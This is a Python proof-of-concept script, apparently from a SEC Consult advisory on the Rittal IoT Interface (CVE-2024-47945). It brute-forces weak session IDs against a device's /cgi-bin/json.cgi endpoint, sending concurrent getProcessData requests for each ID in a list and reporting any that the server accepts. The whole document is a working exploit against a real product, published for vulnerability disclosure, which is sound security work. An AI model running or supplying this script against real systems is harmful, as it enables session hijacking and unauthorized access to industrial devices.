# SEC Consult Vulnerability Lab 2024
# Advisory title: Multiple Vulnerabilities in Rittal IoT Interface
# Author: Johannes Kruchem
# URL: https://r.sec-consult.com/rittaliot
# Script for online brute-forcing weak session IDs (CVE-2024-47945)

import asyncio
import aiohttp
import json
import argparse

async def send_request(session, url, session_id):
    payload = f'getProcessData={{"sessionId":{session_id},"lastTimestamp": 937}}'

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    try:
        async with session.post(url, data=payload, headers=headers) as response:
            response_text = await response.text()
            response_json = json.loads(response_text)
            result = response_json.get('result')
            if result == 0:
                print(f'Session ID {session_id}: Success')
                return True  # Indicate successful exit condition
            else:
                return False  # Indicate continue processing
    except aiohttp.ClientError as e:
        return False  # Indicate continue processing
    except asyncio.TimeoutError as t:
        return False

async def main(session_ids_file, server_ip):
    url = f'http://{server_ip}/cgi-bin/json.cgi'  # Replace with provided server's URL
    delay_seconds = 0.01  # Adjust this based on server capacity

    # Read session IDs from file
    with open(session_ids_file, 'r') as f:
        session_ids = [line.strip() for line in f.readlines()]

    async with aiohttp.ClientSession() as session:
        tasks = []
        for session_id in session_ids:
            task = asyncio.ensure_future(send_request(session, url, session_id))
            tasks.append(task)

            # Throttle requests with a delay
            await asyncio.sleep(delay_seconds)

        results = await asyncio.gather(*tasks)

        # Check if any result was successful (result == 0)
        if any(results):
            print("Exiting because of successful result (result == 0)")
        else:
            print("All requests processed without successful result")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Process some session IDs.')
    parser.add_argument('sessionIDs', type=str, help='The file containing session IDs')
    parser.add_argument('serverIP', type=str, help='The server IP address')

    args = parser.parse_args()

    loop = asyncio.get_event_loop()
    loop.run_until_complete(main(args.sessionIDs, args.serverIP))
